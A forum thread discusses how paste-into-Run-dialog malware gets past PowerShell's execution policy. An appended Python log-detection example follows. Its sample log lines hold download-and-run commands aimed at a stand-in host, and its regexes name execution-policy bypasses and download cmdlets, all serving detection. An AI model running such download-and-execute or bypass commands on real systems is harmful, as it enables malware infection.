Comment by AshamedCaptain 14 hours ago

3 replies

I do not understand how this works. I thought the default PS policy on all versions of Windows was not to run "unsigned" PS scripts by default (precisely for this reason). Or at least I've personally seen that a myriad of times.

So, are these malware scripts signed, has MS relaxed the default PS policy, do users relax it, or has this malware found another way around it?

antonyt 14 hours ago

The attack has the user paste content into the Windows run dialog. That could include spawning an admin PowerShell and running `Set-ExecutionPolicy -ExecutionPolicy Unrestricted` before running a remote script. Or more likely what nullindividual said - the download and start of the exe is entirely contained in what the user is pasting in.

nullindividual 14 hours ago

It's not a script, which would be a .ps1 file, but, from the sounds of it, the actual script block/PowerShell function, which isn't governed by the signing policy. It could simply be an Invoke-WebRequest to download that executable indicated in the article.
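For the detection side of what antonyt and nullindividual describe, here is an added example that is not from the thread or any project: a small Python checker over constructed PowerShell script-block log lines that flags an execution-policy change and a download-then-launch in one block. The simplified log layout, the rule patterns and the sample lines (including the `example.invalid` host) are all assumptions.

```python
import re

# Constructed sample lines in a simplified "timestamp|host|script_block" layout
# (an assumption; real PowerShell script-block log records carry more fields).
SAMPLE_LOG = """\
2024-05-01T10:00:01|WS01|Get-ChildItem C:\\Users\\alice\\Documents
2024-05-01T10:02:17|WS01|Set-ExecutionPolicy -ExecutionPolicy Unrestricted
2024-05-01T10:02:19|WS01|Invoke-WebRequest -Uri http://example.invalid/p.exe -OutFile $env:TEMP\\p.exe; Start-Process $env:TEMP\\p.exe
2024-05-01T10:05:00|WS02|Get-Process | Sort-Object CPU -Descending
2024-05-01T10:06:30|WS02|iwr -Uri http://example.invalid/u.exe -OutFile $env:TEMP\\u.exe; & $env:TEMP\\u.exe
"""

# Each rule: (name, compiled pattern). Case-insensitive because PowerShell is.
# Illustrative patterns only, not an exhaustive detection set; ".exe" alone
# will also match benign blocks, which is why it only scores together with a download.
RULES = [
    ("policy_change", re.compile(r"Set-ExecutionPolicy|-ExecutionPolicy\s+(Bypass|Unrestricted)|-ep\s+bypass", re.I)),
    ("download_cmdlet", re.compile(r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadString|DownloadFile", re.I)),
    ("launch", re.compile(r"Start-Process|\biex\b|Invoke-Expression|\.exe\b", re.I)),
]

def parse_line(line):
    """Split one constructed log line into (timestamp, host, script_block).
    maxsplit=2 keeps any '|' pipes inside the script block intact."""
    ts, host, block = line.split("|", 2)
    return ts, host, block

def classify(block):
    """Return the set of rule names that match one script block."""
    return {name for name, pat in RULES if pat.search(block)}

def scan(log_text):
    """Return (timestamp, host, severity, hits) alerts. A download and a launch
    in the same block is 'high'; a policy change on its own is 'medium'."""
    alerts = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ts, host, block = parse_line(raw)
        hits = classify(block)
        if {"download_cmdlet", "launch"} <= hits:
            alerts.append((ts, host, "high", sorted(hits)))
        elif "policy_change" in hits:
            alerts.append((ts, host, "medium", sorted(hits)))
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```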
